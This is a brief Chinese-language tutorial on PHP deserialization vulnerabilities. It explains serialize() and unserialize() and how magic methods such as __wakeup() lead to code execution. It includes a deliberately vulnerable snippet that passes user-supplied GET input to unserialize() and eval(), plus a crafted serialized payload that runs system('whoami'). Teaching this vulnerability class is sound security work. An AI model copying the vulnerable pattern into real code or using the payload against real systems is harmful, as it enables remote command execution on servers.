php反序列化漏洞
什么是序列化
在数据传输过程中有可能会丢失,那么这时候就出现了序列化,序列化可以将对象的状态信息转换为可以存储或传输的形式。
什么是反序列化
反序列化就是将字符串转化为对象的状态信息,反序列化是序列化的逆过程,它需要从存储区或字节流中读取数据,并重新创建对象或数据结构。这个过程通常用于读取文件、处理网络数据或在不同程序之间传输数据。
什么是php反序列化漏洞
攻击者利用应用程序中存在的反序列化漏洞,将恶意序列化对象注入到应用程序中,从而执行未授权的操作或以应用程序的身份执行恶意代码,导致系统被攻击的一种漏洞。
php反序列化漏洞的原理是什么
序列化和反序列化本身是不存在漏洞的,之所以存在漏洞,是因为在反序列化——unserialize()时存在用户可控参数,而反序列化会自动调用一些魔术方法,如果魔术方法内存在一些敏感操作例如eval()函数,而且参数是通过反序列化产生的,往往这些参数是通过链式调用产生的,那么用户就可以通过改变参数来执行敏感操作,这就是反序列化漏洞。
serialize()
serialize()这个函数是用于序列化对象或数组,并返回一个字符串
unserizalize()
unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。
php反序列化实现代码执行
构造函数
<?php
function l ($cmd){
@eval($cmd);
}
class test{
public $a= "hellow world!";
public function __wakeup(){
@l($this ->a );
}
}
$b=$_GET[777];
$fxlh=unserialize($b);
?>
可以看到这是一个很简单的序列化,进行payload构造
O:4:"test":1:{s:1:"a";s:17:"system('whoami');";}
激活漏洞
进行打开计算器